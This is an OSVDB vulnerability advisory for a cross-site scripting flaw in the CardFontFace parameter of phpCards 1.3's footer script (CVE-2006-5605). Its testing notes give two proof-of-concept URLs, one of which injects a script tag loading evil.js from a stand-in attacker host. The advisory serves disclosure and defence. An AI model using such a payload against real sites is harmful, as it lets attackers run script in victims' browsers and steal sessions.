phpCards phpcards.footer.php CardFontFace Variable XSS

2006-10-16T21:12:10
ID OSVDB:34251
Type osvdb
Reporter OSVDB
Modified 2006-10-16T21:12:10

Description

Manual Testing Notes

/phpcardsv1.3/phpcards.footer.php?CardFontFace="><i>xss</i> /phpcardsv1.3/phpcards.footer.php?CardFontFace="><script%20src%3dhttp://[attacker]/evil.js></script>

References:

Security Tracker: 1017070 ISS X-Force ID: 29616 CVE-2006-5605